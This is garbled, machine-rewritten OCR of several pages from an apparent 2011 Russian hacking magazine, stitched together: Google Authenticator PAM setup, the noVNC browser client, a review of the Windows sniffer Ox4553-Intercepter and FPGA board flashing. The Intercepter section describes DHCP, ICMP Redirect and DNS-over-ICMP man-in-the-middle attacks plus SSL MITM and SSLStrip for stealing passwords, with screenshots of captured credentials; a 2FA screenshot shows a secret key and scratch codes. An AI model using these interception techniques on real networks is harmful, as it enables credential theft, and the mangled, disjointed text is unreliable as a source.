гает е щ е равно вторую порция системы, кото р ая сии самые ключи п роверяет.

Ты беспре п ятс т вен н в рассуждении може ш ь из ка ч ать n относительно д ключаемый мо дуль аутенти­

0.

Получен н ый л ан для мож н по части откр ыт ь во канделябр у зере. Н а экране появится

QRGoog le

фика ц ии IPAMI равно утилизировать п р елести двухфакторной авториза ц ии ,

код, ко т орый нужно сосканировать нателефоне приложением

держи п р да мер, на

Authen ti catoг, с тем то, на свою очередь, сохрани л что касается сге н ерирова н ный

OpenSS H.

потаенный кнопка . Заметь, п р ог р амма старым порядком буд ет г е н ериро ­

За г ружаемисходники РАМ - мо кукиш от маслом с

0.

hg cl one http s : // googl e-a uth ent ic ator.googl ecod e . com/ hg/ goog l e- auth enti cator /

0 Ud~n :

search

~rmlnal

tlelp

Ребу т аем

а

SS HD, дай тебе изменения вс т упили во си л у, равно убеж д аемся,

ась? д ля в области д ключения те п ерь нужен до сейте поры равным образом краткосрочный ключ! :Х:

0:13

oogle

ntu :-S ./ooogte· authenticator

. ,yuogl.e -authentlcator : I s

yastepOubuntu:-s cd

0.

)П '::;::-

astep~ubuntu tusr{Ыn

~ew

вать ключи идлятвоегоаккаунта на Google (само собой, р азн ы е!.

Google Code хранилища:

00 %~

Authenticator

directory

t usrt Ыn

astep@Ubuntu :/usr/ ЫnS googte -authf!nticator ht tps : 0/ Wttl. goog \е. COfl/ chart?chs=288x268&ch tcl: p@ubunt U\ЗFsecret\ЗDYOF

060510

Р У v OFSPWIL6PRYLVBQ

our new secret key is :

stepaл.ityin 0gma~ .com

Vour ver!ficati on code s our u.ergency scratch codes are: 37214335

06813261

02254763

04485257

yastep@ uЬuntu

0397836& 52716828

Do you want о

Ее

to update your · - t. google_auth•

you want to disa\tow

мu\t i pte

Настраиваем РАМ - устройство

ОЭt.

uses of the : Сканируем QR-код нателефоне

Получа е м проходящий ко люч

Вводим контролька близ подключении

ХАКЕР

01 / 054/2 011


Proof-of-Concept VNС-КЛИЕНТ НА

HTML5

Каждый раз, от случая к случаю голос заходит касательно решении ради удаленного подключения ко рабочему столу, автор сих строк во всякое время обращаем забота на важный момент: позволено ли пускать в ход его непосредственно изо браузера?

Многие известные провиант предоставляют подходящий функционал, но веб-клиент реализован около помощи

noVNC

Java

не ведь — не то

Flash. Создатели

форвард дальше. Это первая сбыт VNС-клиента,

до конца написанная нате HTML5 [WebSockets + Canvas].

WebSockets, замысел заключает во себя websocket-js-этo эмулятор WebSockets, исполь­ зующий к работы Adobe Flash. Быстрый указатель Javascгipt Engine. Если бы у браузеране было быстрого JS-движка, едва ли посчастливилось осуществить настоящий про­ токол

RFB.

На практике скорее общем подходят Chгome и Fiгefox, которые используют технологию Native

WebSockets.

ЧТО ВНУТРИ Технология VNC IViгtual Netwoгk Computingl издавна

HTML5. Фишка на том, в чем дело? такая действие полноте

пoVNC- сие формирование нескольких модулей, которые рендерят изображения, обрабатывают

стала одним с самый популярных решений

типично совершать работу весь бери любом

про подключения для удаленному рабочем столу. В

устройстве, ради которого глотать браузер, п оддержи­

внедрение данных, поддерживают сетевое соеди­

ее основе лежит прошедший испытания временем отчёт

вающий новые стандарты.

нение . Каждый с модулей написан таким

RFB lгemote fгamebuffeг]. У lntel аж появилась -lntel KVM, по причине

его аппаратная совершение

которой твоя милость можешь удаленно включиться ко

образом, в надежде делать подина разными браузе­

ТРЕБОВАНИЯ

рами. Наиболее важными являются, во-первых,

Display linclude/display.jsl, некоторый занимается

компьютеру снова вплоть до запуска относительно перац ионной систе­

noVNC использует самые современные воз­ можности HTML5, отчего главные спрос

рендерингом изображений со через НТМL5-

мы. VNС-клиенты не возбраняется отрыть с целью любых ОС, на

программа предъявляет ко браузеру. Он вынужден

элемента canvas, во-вторых, RFB linclude/гfb.js],

фолиант числе да мобильных . Но днесь поглощать реализа­

поддерживать:

являющийся основным классом с целью реализации

ция, которая весь безграмотный зависит ото платформы.

• •

noVNC l kaпaka.github.com/пoVNC I работает в браузереи использует только лишь только потенциал

HTML5 Caпvas lc cгeatelmageDatal. НТМ L5 WebSockets. Для тех браузеров, которые отнюдь не имеютвстроеннойподдержки

протокола RFB, и, в-третьих, Websock linclude/ network.jsl, тот или иной используется чтобы передачи данных Native WebSockets да автоматически переключается держи технологию Flash Websocket в случае необходимости .

КАК ИСПОЛЬЗОВАТЬ? До тех пор, на срок твоя милость далеко не используешь VNC-cepвep с поддержкой соединений чрез

WebSockets

!таких на правах x11vnc/libvncseгveгl, тебе придется использоватьспециальныйпрокси -с ервер

Web5ockets2TCP. К счастью, сбыт такого посредника, написанная получай Python, включена в вариант !это websockifyl и, что такое? важно, имеет встроенную поддержку SSL/ТLS-шифрования 0 "wss://"1. Для введение работы очищать специальный скрипт, какой-никакой запустит mini-webseгveг, возьми

котором в будущем довольно думать подключения, и WebSockets-пpoкcи. В параметрах необходимо указать адресок запущен н ого VNС-демона:

./utils/launc h .s h --vnc localhost:S9el Прокси позже запуска выдаст URL, который необходимо вделать во браузер. Далее останет­ ся оказать нажим получи и распишись кнопку «Connect >> равно наслаждаться подключением. Запущенная прокси будет принимать подключения да передавать их

noVNC малограмотный требует ничего,

ХАКЕР

01 /154/ 0011

исключая браузерас

HTML5

реальному VNC-cepвepy. ::Х::

035


PCZONE

О томик , что такое? снифер

Ares lintercepter.nerf.rul

Ox4553-lntercepter-

снаряд исключительный, писал единаче Крис Касперски на далеком

0008

году. С тех пор настоящий

прекрасный виндовый снифер обзавелся единаче более убойным функцианалом с целью реализации МIТМ-атак .

ПРАВИЛЬНЫЕ МIТМ-АТАКИ ПOДWINDOWS

В томишко числе техниками на перехвата шаг ролей, которые должны сообщаться в области

SSL.

Сни ер+ МIТМ-атаки -

Ox4553-l ntercepter 036

ХАКЕР

01/154/2011


Снифер + МIТМ-атаки=Ox4553-lnteгcepteг

Remote Сарtи~е jrpcap:/ /192.168.0.50 0 not ho Г On To/From 192.168.1 .2:80/19... 74.125.39.84:80/1 ... 192.168.1.2:80/19... 74.125.39.18:80/1 ... 192.168.1.2:80/19...

Web Site visit.. . Web Site visit... HПPAuth

Host accounts.google.com accounts.google.com 192.168.1.1 01 192.168.1.5 www.paypal.com

Username asdf asdf gmail.com gmail.com adsf

ARP Poison From- - - - - - - - - - ,

Password asdfadsf asdfadsf

00:36:18... 20:36:18... 20:36:18... 20:36:17...

092.168.1.2:80/19... 66.211 .169.65:80/... 192.168.1.2:80/19... 173.0.84.3:80/192...

092.168.1.111 192.168.1.5 192.168.1.111 192.168.1.5

0 092

-

г-:-:19:::-2-.1~6:::-8-. -:----:--

r

lllll#~!l~t.i•ICJ#IёiMI$:t..iiii*I?J81:11tMU&JDШt!Jф!i§.J, ,AWI$Q

Web Site visit ... Web Site visit... Web Site visit... Web Site visit...

r

. 068 .

0

так l

Add

www.paypal.com www.paypal.com paypal.com payoal.com

Delete

092.168.1.5 ·> 092.168.1.1 192.168.1.1 ·> 092.168.1.5 S top Poisoning Change МАС 4487fc73624e

0.~1:!0

CJ1101 1QI101

0

Change

0 0

Reset

Configи~ation

~ Resolve Hosts О Autosave ~ GridView О eXtreme Mode ~ Promisc ~ Unique Data

ы

@

@

\Packets: 0348 (l.SбMb)

О CaptUie Only

IRC\BNC

О Only Data lM Ports- - - - ,

f'6665Тs6e

J5190.9898.5222.5(

г НТТР=-1 г SOCKS

::l

L~ LI1oвo ~ VW

lнosts Found : lr:cc-u_rr_e-n t_m _ o-, de- :-:Pc-a-ss_w_o-rd-:w-:-in- d-:-o-w-'----'=" - - lstatus:

IParsed: 000

Ox4553-lntercepter показывает перехваченные пароли

В ЧЕМ УНИКАЛЬНОСТЬ

INTERCEPTER?

атак . С версии 0.8 на ансамбль lnteгcepteг добавился таково называемый

Достойных сниферов не без; таким огромным багажом реализованнных атак

Ох4553-NАТ. Это полновесный NAT, безвыгодный требующий устано вки да зани­

подо

мытарящий пару сотен килобайт, которым дозволительно делить и да и нет во

Windows почти что нет. На так очищать порядком причин. Основная пробле­

ма заключается во отсутствии штатных инструментов маршрутизации.

небольших локальных сетях либо — либо дома. Он поддерживает трансляцию

Если на каждом unix'e убирать состояние будто iptaЫes, подле помощи которых

движение кетов изо etheгnet на РРРоЕ-соединение АОSL-модема да трансляцию

не запрещается помимо труда прикинуть необходимые миропонимание перенаправления

FТР-сеансов. Помимо сего была реализована издревле задуманная

движение кетов, ведь во винде, а тем паче во ее клиентских версиях, нисколько подоб­

наступление сверху се ти из DHCP- DHCP MITM . И гляди сейчас, минуя долгое вре­

ного нет. Е стес твенно, выводить близкий NAT !или неэффективный ip foгwaгdeгl

мя, вышло пока что мало-мальски изрядно крупных обновлений, реализую­

из-за какого-то единичного примера чуточку кто именно станет. Различные

щишки х новые интересные техники атак.

техники перед Windows представлены, в качестве кого правило, во виде простеньки х

0. ICMP Redirect МIТМ . Эта малораспространенная оборудование перехвата

ргооf of сопсерt равно н е более. Впрочем , что-что таить, да около uпix мудрено найти что-то похожее возьми lnteгcepteг. Тот а самый etteгcap лещадь unix состоит из различных приложений: одно отвечает следовать агр-спуфинг, другое- ради гра­

бинг движение ролей, а sslstгip равным образом решительно самостоятельное приложение. Все это требует покорный настройки из-под консоли. Получается, аюшки? да подо unix, даже подле всей скелет доступны х инструментов, кто в отсутствии ни одного достойного

GUI-приложения, которое совмещало бы во себя целое сразу. lпtегсерtег же является таким инструментом равным образом заключает во себя общий укомплектование от­

тестированных равно законченных кондуктор сетевых атак. К прообраз у, недавно реализованные техники SSL MITM равно SSL Stгip для того пер ехвата танцевальный шаг ролей, которые должны бы вручаться до защищенному соединению, могут

ARP, ICMP, DNS оvег ICMP, DHCP. Во всех случаях используется скрытная маршрутизация через никак не существующие во узы IP- равно МАС-адреса, таким образом, жерт­

трафика имеет порядочно узкое применение, позволяя перехваты­ вать материал посреди единичными хостами .

0. DNS over ICMP МIТМ. Совершенно новая техника, раскрывающая весь ресурсы ICMP Rediгect. Перехватывая заказчицкий DNScepвep, да мы не без; тобой можем навернуть безвыездно соединения со хостами, которые

были отрезольвены путем DNS. 3. SSL МIТМ. Классическая сноровка подмены сертификатов, по части зво­ ляет перехватыватьданные любых протоколов, защищенных близ

помощи SSL !поддерживаются SSLv2, SSLvЗ, TLSv11. 4. SSLStrip. Практически неграмотный встречающаяся сноровка почти Windows. Аналог известного sslstrip по-под unix.

употребляться не без; любым с имеющихся МIТМ'ов:

Каждая изо сих технарь заслуживает внимания, а зачать моя особа хочу с описания атаки

DHCP MITM, которая появилась до этого времени годочек назад.

вам никак не смогут предначертать происхождение нападения. Сегодня автор отнюдь не будем

выбирать получи базовом функционале снифера IРОF-версию статьи

ОНСР

MITM

Криса твоя милость можешь отрыть держи диске! , а коснемся самого сочного - новых

Суть атаки проста что nять коnеек. Существуют разные

техник, которые не далее как появились на Ox4553-lnteгcepteг.

схемы nоведения ОНСР-клиентов. Мы рассмотрим древний

вариант. Когда комnьютер входит во сеть, некто шлет оповещение

НОВИНКИ ФУНКЦИОНАЛА

DHCP Discoveгy, треб уя загнуть словцо IР-адрес да отправить действующую

По отпечаток ний крат lnteгcepteг обновлялся символически лишше годы назад.

конфигурацию сети, включительно зад по части умолчанию. Наша теорема

Тогда-то да было соз дадено первооснова содействие на различных

-выдать фальшивый отзыв DHCP Offeг, на кото кашаса хорошенького понемножку указана

ХАКЕР

01/154/2011

MITM-

037


PCZONE наша архитектура вместе с нашим шлюзом. Так затор пойдет через наш

NAT равным образом я сможем непринужденно его слушать. Данная ата­

ка походя описана во теории, реализована во etteгcap, улучшена

КРАТКО О

OX4553-INTERCEPTER

равно автоматизирована во Ox4553-lnteгcepteг. Для проведения атаки пришлось сделать выбор линия сложных вопросов:

0.

Не славный количества существующих компьютеров во волокуша да

Перехватывает парали равно хэш-суммы на огромного

их связь для IР-адресам. Можетпривести для проблемам на яма равно

количества сервисов: ICQ/1 RC/AI M/FТP/IMAP/POP3/SMTP/LDAP/

истощению DНСР-пула.

В N C/SOC KS/HПP/WWW/N NTP/CVS/TELN ЕТ /М RA/DC++!VN С/

0. Борьба из-за первородство со легитимным DНСР-сервером . 3. Возврат контроля по-над жертвой, уведенной легитимным сервером.

Перехватывает сведения большинства известных мессенжеров:

ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC/MRAI. Реконструирует SMTP/POP3 сообщения.

Вся чернокнижие кроется во решении сих пр облем.

0.

MYSQL/ORACLE.

Чтобы безвыгодный пораждать проблемы во действующей сети, да мы вместе с тобой перена­

Сканирует локалку бери существование живых узлов вместе с через

правляем всех клиентов на виртуальную сеть, отделенную ото дей­

широковещательной рассылки АRР-запросов IARP SCANI .

ствующей. Для поддержания знакомства из реальной сетью равным образом внешними

Ищет во силок DНСР-серверы IDHCP DISCOVERYI.

ресурсами нет слов всей красе раскрывается Ox4553-NAT, регламентирующий

Находит во локалке иные сниферы IPROMISCUOUS SCANI.

маршрутизацию.

Поддерживает подмену М АС-адреса с целью LАN-адаптеров.

Благодаря рядутестов было выявлено, сколько DНСР-сервер на

Может коптеть на режиме «экстремального>> сканирова ния

lnteгcepteг из использованием WinPcap работает быстрее других. Он

leXtгeme model, около котором сниферу хватит за глаза обратить целевой

оказался быстрее DНСР-службы Windows Sегvег 0003, быстрее по­

документ помимо специфицирования порта. Ox4553-lnteгcepteг полноте

пулярного приложения

tftpd32 равно быстрее DНСР-серверов, встроен­ ных во АDSL-модемы. Помимо этого, DHCP на lnteгcepteг пропускает

просматривать поголовно трафик, автоматично «вылавливая>>

весь шагсогласования параметров нет слов сезон передачи конфигу­

содержимого .

рации клиенту, ась? имеет важное значение повышает темп реагировани51

Поддерживает RАW-режим .

0.

пакеты, относящиесяк данному протоколу как следует анализа их

да выдачи ложной информации.

Выполняет отдаленный снифинг трафика при помощи RРСАР­

Возможна ситуация, чтолегитимный DНСР-сервер все от­

демона, устанавливаемого в L inux/xBSD иначе Windows-yзлax

ветит быстрее нас. Такая обстановка была неискренно создана.

!nредпочтительнее всего- бери шлюзе! .

И на ее решения предприняты дополнительные действия.

Включает во себя собственную реализацию

После принятия конфигурации давальщик надо снова крата пере­

Реализует малость МIТМ-атак:

проверить, далеко не занял ли возлюбленный чей-то надсыл во сети, воеже избежать

DHCP MiTM.

конфликта 0Р-адресов. Для сего спирт отсылает на обмет специаль­

Перехватывает SSL-пароли от SSL MiTM + SSL Stгip.

0.

NAT. ARP MITM, DNS оvег ICMP MiTM,

ный донесение gгatuitous а гр. Если на тенета ранее в наличии маршрутизатор от

таким адресом, заказчик снова пошлет DHCP Discoveгy вместе с просьбой выделитьдругой адресок . Если но никаких ответов получи запрос не пришло, значит, этот

IP свободен. При потере клиента ,

направить жертве сообщение, на котором полноте указано, который впредь до 0.2.3.4

lnteгcepteг следит вслед танцевальный шаг кета ми gгatuitous а гр равно отвечает клиен­

нужно шествовать путем свой шлюз, идеже запущены lnteгcepteг да NAT. Это равно

ту, говоря, что-нибудь из-за званый адресочек занят, на того с тем вновь

лакомиться оборудование ICMP Rediгect MITM. К сожалению, наш брат безвыгодный можем п ере­

вытребовать плебисцит равно постараться подоспеть отморозить ложную кон­

послать единовременно всё-таки хосты, отчего данную атаку не возбраняется использо­

фигурацию. Данная приступ до мельчайших подробностей рассмотрена на видео Sniffing

вать в целях целевого перехвата конкретного узла. Однако на lnteгcepteг

dhcp based пetwoгk.

реализована техника, которая позволяет усиленно добавить область применения перехвата из через сообщений ICMP Rediгect. Это DNS

ICMP

REDIRECТ

MITM

И

DNS OVER ICMP MITM

оvег ICMP Rediгect.

Следующие двум техники используют пользу кого атаки особенности IСМР­

Вместо

site.com да мы не без; тобой будем перенаправлять движение через клиентского

протокола. Не вдаваясь во технические подробности сути равным образом назна­

DNS-cepвepa. Цепная рефлекс вслед п ускается всего делов одним танцевальный шаг кета м.

чения сообщений ICMP Rediгect, отмечу, что такое? сии IСМР -сообщения

Сначала ты да я шишак жертве сообщение, сколько впредь до его DNS-cepвepa нужно

позволяют прикинуть учет на таблицу маршрутизации удаленного

шествовать чрез отечественный шлюз, в рассуждении сего во разбитое вступает Ox4553 -NAT, какой на­

узла. В склерозник принуждён храниться IР-адрес хоста равным образом IР-адрес

чинает подвергать обработке DNS-ответы. Например, пострадалец хочет отрезаль­

шлюза, помощью какой надлежит посылать пакеты ко указанному ресурсу.

свивать

Например, зная, в чем дело? неведомый

отзыв равным образом вытаскивает целое 0Р-адреса, отвечающие ради site1.com, задним числом

site.com имеет ячейка 0.2.3.4, автор можем

site1.com, -

NAT перенаправляет требование ко серверу, принимает

почему посылает жертве новые сооб щения ICMP Rediгect, говоря, сколько ко всем отрезольвенным IР-адр есам нужно исходить вследствие свой шлю з. Если ("} ОхШJ-NдТ 010.4.4

Г"'"'""

благодеяние посылает просьба для site2.com, условия повторяется. Таким образом, огульно интернет-трафик начинает двигаться вследствие lnteгcepteг равным образом

Werfoce

NАТ.

on192.168.12

r

Правда, шелковица лакомиться одно важное условие. Чтобы в области показывать его, рас­

Wetr>ol Werfoce

смотрим образчик сетный конфигурации жертвы: on192.168.1 .2

r

г Cortig1.rlllion

Ro<Aer"s IP 1 092 . 068 .

0

Гl---=-sом---=-Nд--Т--,1 Р" Profrisc ~

Cierts IP

r

! 092 . 068 .

. 011l

01 -

Clent

J192.168.15

. _ _ j Г РРРоЕ

ОНСР

Э

0

SSl

МIТ"'

Р"

SSl l OQ

t! ~

~---=============-----

IPockeb IN: SSL МIТМ. Настройка Ox4553-NAT

038

steolh

uT""""" ~ l

Г steolhiCMP Р ICMP ,__, ГгSSl port

Р"

PPPoE Clent'siP===--1

r_

Г

0

р FТР

- 092.168.1 . 00 - 092.168.1.1

IР-адрес

жертвы

IР-адрес

шлюза

IР-адрес

DN5 - 092.168.1.2

святочная харя

- 055.255.255.0

При этакий конфигурации переслать DNS-cepвep наша сестра не сможем. Он непременно полагается фигурировать следовать рамками данной подсети,- сие обусловлено самим протоколом

ICMP. А гляди если бы ис­

пользуется напрямую показный сервер !например, гугловский

0.8.8 .81,

ведь препятствий пользу кого атаки нет.

ХАКЕР 01 / 054/2011


Снифер + МIТМ-атаки=Dx4553 - lnteгcepteг

АТАКИ

HASSL

Configuration - - - - - - - - - - - - - . ,

р Promisc SSL MITM Эта форсинг описана пропасть раз, позтому застрять подроб­ но держи ее описании автор невыгодный будем, а расскажем, наравне симпатия реа л изована

существенно во lпtегсерtег. Ядром всех М I ТМ - атак на lnteгcepteг, на правах мы уже говорили, является

NAT.

Именно некто отвечает следовать маршрутиза ц ию

п а ке т ов равным образом доnолни т ельные д ействия в целях реализации каждой изо

атак . Стандартно во отнюдь не г насчёт вслед за ш ит перехват таких протоколов:

Г stealth DHCP

~ limeout ] 1

гз

Г steaRh ICMP Р' ICMP Updote ~ SSL portl Г SSL MiTM р SSL Log го;­ р SSL strip

Н ТТ РS-443 ;

PO P3S - 095; SMTPS-465; IMAPS- 093.

Конф равно гура ц равным образом да

П осле запуска Ох4553-NАТон открываетуказанные п орты возьми локаль­ ном интерфейсе равно ж д ет входящих соедине н ий. Весь движение жертвы по указанным оборона т околам nеренаправляе т ся получи и распишись досель откры т ые н ами

Ox4553-NAT

(5. Добро нагрянуть во PayPal - Windows

порты. Н а з т об м э т аnе происходитследующее: В случае НТТРS

р FTP

http: //www. paypal. com/ru

NAT принимает входящее t ср-соединение , делает

заnрос для заnрашиваемому ресурсу равно получает его сертификат.

Затем спирт nодменяет родник шифрова н ия получи особенный равным образом устанавливает

Добро nожаловать во

сращивание не без; жертвой, выдавая себя из-за характеристичный сервер. П ослезто г оnроисходитnроксированиеда нн ыхмеждудвумя соединениями.

Во вре м моя персона проведения ат аки

Для других п ро т околов молчок г заnроса оригинального сертификата

SSL Strip у

PayPal

для л ие нт а м еняется f avicoп

оnущен,- чем зто г насчёт автор сих строк п осылаем впереди сге н ерированный ста т ичный сертификат. Так по образу наши сертификаты малограмотный являются

Расскажу об этом подробнее. Д ля азы нам незамысловато нуж н насчёт

за дп исанными д оверенными центрами, у пользователя хорэ вы­

понимать вмещающийся пробка на текстовом виде, а то никаких ссылок

скакива т ь п редупрежде н ие. В этом равно заключается узловой изъян

наша сестра малограмотный найдем. Все работа во том, зачем для того снижения наг р узки да увели­

дан н ой т ехники.

чения скорости передачи данных во ноталгия ш инстве случаев nакеты сжимаются такими ал г оритмами наравне

Кроме nриведенных раньше п ротоколов, юзер может доба­

gzip да л равным образом deflate.

О потенциал

допускать такие п акеты веб-браузер сооб щ ает серверу во соответ­

ви т ь какой приглянется новый п орт. О том, на правах сие сделать, написано на руковод ­

ствующем раздолье wеЬ-запроса. П ервым замолчите г ом мы вляется разновидность

стве для сниферу. Так наравне хозяйка наскок п рово д ится подле помощи

полина

NAT, так

неnосредственно l nteгcepteг далеко не видит зашифрованых несомненно н ных. Чтобы

возлюбленный их увидел,

NAT делает

следующую хи т рость: огульно распространяющийся

Accept- Encoding,

за которого целый машинопись посылается на от­

крытом виде. Также нельзя не заме н ит ь безопас н ые куки, иначе возникнут произведение н ости вместе с установлением сессий, скажем сверху книга но

SS L-трафик дублируется на трал во касательно т крытом во иде, за что такое? парали

gmail.

п ояв л яются во ок н е снифера.

променять httрs-ссылки их небезапасным аналогом

Ищем флажок Sec u гe равным образом заменяем его бери

HttpOnly. Теперь можно http. Д алее

возле запросе изменен н ого https-ypлa да мы не без; тобой устанав л иваем ht t рs­

SSL STRIP О т ехнике

связывание вместе с оригинальным ресурсом равно nроксируем дан н ые меж д у

SSL

Stгip наша сестра п одробно nисали во

#125

номере [РОF-версию

клиентом да сервером. Чтобы опрокинуть неослабное внимание пользователя,

статьи твоя милость н айдешь н а диске). Собстве н да го во шум ваш покорнейший слуга , никак не п осре д не без; т венно

lnteгcepteг подменяет

со перех на а т ом

имитирует безопасное соединение. Н а дан н ый моме нт l nte г cepteг

SSL

буква технические приёмы далеко не связана. Перехва т ывать необхо­

favicon,

выдавая иконку из замо ч ком, кой

димо нормальный Н Т Т Р-трафик, анализируя его в httрs-ссылки. Воз­

невыгодный убивает сессии в целях п ри нудительной повтор н ой ав т оризации, наравне

мож н в отношении твоя милость помнишь, как много много н равным образом бы л о, с целью застави т ь э т у схему

зто может творить оригиналь н ый sslstгip, а такая что до п ция будет, воз­

делать лещадь

unix,

ис п ол ь зуя разработанную Мокеи Марлинспайком

можно, добавлена на будущем. Е ще мож н об вас д е л ить одно отли ч ие

утилиту sslst гi p. Все что-нибудь нуж н насчёт сдела т ь на lnteгcepteг на выполне­

данной реализации

ния а т ак

sslstгip работает вроде nрокси, в отношении п ределяя куд а nроизводится соеди­

SS L Stгip

другими словами

SSL MITM,- сие

пос т авить соответствую­

SSL

Stгip ото ее uniх-аналога. Ори г инал ьн ый

щую га л очку равно п еренаправить движение жертвы любым достуnным

н ение изо заголовка wеЬ-запроса. Это вынуждает разрешат ь отчество

со п особом . В данном случае огульно веб -трафик nерена п рав л яется держи

сервера после

л окальн ы й 00-й порт, откудова равным образом происходит дальнейшее nроксиро­

случае во этом малограмотный т необходимости, приближенно как бы местожительство назначения из­

dns

вание соединений. Выполняя дан н ую а т аку, ты да я ещё но стал­

вестен,- сие

киваемся от близко сложностей, ко т орые необхо д имо nреодолеть.

трафика жертвы.

равным образом храни т ь особый собс т венозный d ns-кeш. В н а ш ем

Ox4553-NAT,

что да осущес т вляет мар ш рутиза ц ию

I

I'R ealtek PCI е FE Family Controller' on local host:192.1 08.1.2 Protocol HПPSAuth

SMTPS Auth POP3S Auth SSL МIТМ .

ХАКЕР

Time/Date 11:57:41 .. . 11 :57:34... 11 :57:31 ...

To/From 199.58.21 0.12:44... 74.125.79.16:465/.. . 74.125.39.16:995/.. .

Host packetstormsecurity ....

Username packetuser

Password secret%3Bas 456 123

nерех ваченные парали

01 / 054/2011

039


0

в отношении

что до

что касается

05

о о

что касается

о о

в рассуждении

о о

об

по отношению

насчёт

по отношению

01


Ooyouw!nttospeclythelnitloJiconteN:r::Jthememory1 ~

rr

~le.weitblrk Г ~memorycortentdьt.ttoXX .. Xon powef"Ц) n ~

0

r.

Yes, use tNs Не for the memory content dot:41 ('ll::lu е«1 vse 01 Нех.Юеам1 (lnteНonмt) ~ [.he:x] or 01 метоrу II'Юiiz.IOon,._

(.n*D

FieМ«oe: t .fasonl/memory.n* The ~ contett fie shoUd mdonn to ""'*h port's

"""""""''

IPORTJI

Т шум

View

W!te Bond

Cycl one ЕР1 СбТ144С6


Speclythe,..u. filestoconvert .-dthe typed ~0!1«ТТI'W''9f*to 0tf81lte. You см .;ю Щlort ro.,t file Worrмtioro from other Неs .-d s.we the ccnmslon sehC) WC!rfМUon aмted hero for f~.t~.nuu.

- Outp.A:~O!J~f~

~~~~~~' Г.lл~~~~~п~ю~с~~=~==~~~(.~~~)------------------------------------~ Qpljon>... File~:

0

0

Advllf"ICed...

0 '""'""""""''""

r.: iEPCS=,- --------------3"' """''

OIA:plt.flo.jc

0Romotej\oc~updatoclfferenc:ofie: F7

МОmоrуМорНе St•tAdctess


Монитор ко каждой железке!

Теперь требуется отпечатать часть да понять, в духе настоящий алгоритм реализован . Но прежде лучше, конечно, полить ручьем за нарушать верность равным образом

текста- заnускаешь да начинае шь печатать, меняя , подле н еобхо партия о­

сти, цветик фона равно текста .

проветрится. Я на этом модуле чаятельно что однако знаю, так да ведь задымился,

пытаясь объяснить'

Ну вот, ныне твоя милость мож ешь со мело попросить свою боевую подо ­ ругу, в целях которой представление « кварц возьми

02 М Гц>> безграмотный является пустым

звуком, равно по части показывать достигнутый результат' Но коли отчего-то мешает Почти целое •••

ангажировать подругу ко себя (родители сиречь баба ! , вышеописанный

После написания всех модулей, нам надо их соеди шерстинка на одно

метода прошивки малограмотный подойдет- график сотрется за единый вздох в дальнейшем вы­

целое. Можно содеять э в таком случае отдельным модулем, да ми предпочтитель­

ключения питания. В этом случае поступаем так. Заходим на

нее графичный способ. В Pгoject Navigatoг выбираем вкладку Files,

File 0 Сопvегt Pгogгammiпg Files. В появившемся окне

получи и распишись каждом модуле щелкаем правой клавишей мыши равно выбираем редюит

делаем следующие настройки:

Сгеаtе Symbol Files fог Cuггent Files- тем самым автор сих строк соз согласен ем заго товку

0.

множества вариантов находим Block Diagгam /Schematic Files.

0.

В получившемся эскизе найди кноnку Symbol tool (значок во виде розетки! инажми его- появится окно, на котором дозволяется выбрать наши из-за готовки . В левой части окна открой папку со проектом , щел ­ кни нераздельно единовременно намодуле-в правой части появится изображение, в

котором твоя милость уви дишь устройство со входами/выходами. Е сли всегда н ормаль­ но, жмиОКипомещай устройство на рабочее промежуток . Далее моду ­

0. 4.

Pin Tool да выбери, на каком

качестве конечность короче использована: вход, размер выработки alias двунаnравлен­ ная. Получившийся знак помести получи и распишись схему равным образом зайди на его свойства, где измени название бери требуемое . Посл е сего соеди ни его не без; нужным

Если вкушать обязанность , дозволяется адресовать прозвание выходного файла.

папке вместе с проектом .

0.

Когда заданный обложка п в отношении явится на списке, выбери егоинажми кнопку Pгopeгties . Свойств далеко не густо- лишь одно, зато нужное:

Пол учив шийся вывод твоя милость можешь понимать получай картинке 0.

А в качестве кого на качестве входа/выхода показать физическую ножку ПЛИС?

Device выбираем EPCS1 - не сколько иное таковой

В разделе l пput Files to сопvе гt выделяем не без; т року Flash Loadeг, жмем Add Device .. равным образом указываем свой Cyclone. 5. Выделяем строку SOF Data Page_ O, жмем Add Files равным образом выбираем файл конфигурации со расширением .sof- возлюбленный обязан рости во

левую клавишу равно ведешь, слабо требует ся. Нич его сложного тогда нет.

Для сего найди выпадающий наличность

Из списка Coпfiguгatioп

конфигурационный фишка сто ит у нас возьми плате .

ли надлежит сплотить среди собой- подводишь мышку ко нужному вхо­

ду/выходу- маркер меняется бери оригинальный приц ел, зажимаешь

Из выпадающего списка Pгogгamming file type выбираем ЛАG

lпdiг ect Configuгation File (.jicl.

с целью графического дизайна. По сле сего выбираем File7New равно промеж

Compгessionl Ставим галочку с целью подтв ерждения.

0.

Жмем Geneгate .

0. Опять запускаем программатор, жмем Add File да выбираем создан­ ный нами обложка со ра сширен ием .jcc. 9. Ставим галочки Ргоgгаm да Veгify да наконец-то жмем старт. После перезагрузки платы стартует наша программа!

модулем вышеоnисанным способом.

· Но равно покамест неграмотный все! Выбираем Assigments7Pin Planneг равно во nоявив­

шемся окне делаем окончательную доводку. Внизу будут перечислены

КУДА ЖЕ МЫ БЕЗ МЫШИ? Уже под хотел завершить статью, но, смотря держи морда из символами,

до этого времени наши входы/выходы не без; теми именами, которые я задали. Рядом со

понял, что-то далеко не хва т ает мыши' У нас а принимать чтобы нее разъем' Остальное

каждым изо них на закраина Lo cation указываем требуемую ножку ПЛИС.

оказалось делом техники.

П насчёт ссылке

ПРОШИВКА ПЛАТЫ

мышью

твоя милость можешь из валять узел для того работы не без;

MouseRefComp. В сост аве скача нн ого архива питаться атомный

Теперь, нет-нет да и безвыездно nозади (а когда твоя милость въехал на алгоритм, тебя мирские

мануал пользу кого работы из модулем , таково в чем дело? никаких вопросов отнюдь не возник­

условия сделано отнюдь не интересуют!, осталось наметать плату. Втыкаем nрограм­

ло' Более того , устройство ранее выдает информацию во виде положения

матор на USВ-порт компьютера да на ЛАG-разъем для nлате. Драйв буян про

курсора мыши получай экране 040х480.

nрограмматора безбоязненно ищи во установочной nапке Alteгa (опя ть отсылаю

Сначала изменим воссоздание модуля

VGA- добавим пара входаХ да

для ресурсу maгsohod.oгg, идеже всегда по нитке расписано!. Посл е установки

У- сие будут месторасположение мыши. А самоё отрисовка курсора займет

программатора вызываем Tools 0 Ргоgгаmmег, идеже осталось указать,

лишь одну(IJ строчку:

что такое? пишущий сии строки пользуемся ЛАG равным образом что за у возьми не без; программатор (Нагdwаге Setupl. Жмем Staгt- да наша nрограмма еще находится на памяти платы.

Чтобы проконтролировать работоспособность, нужно кабелем RS-232 (он

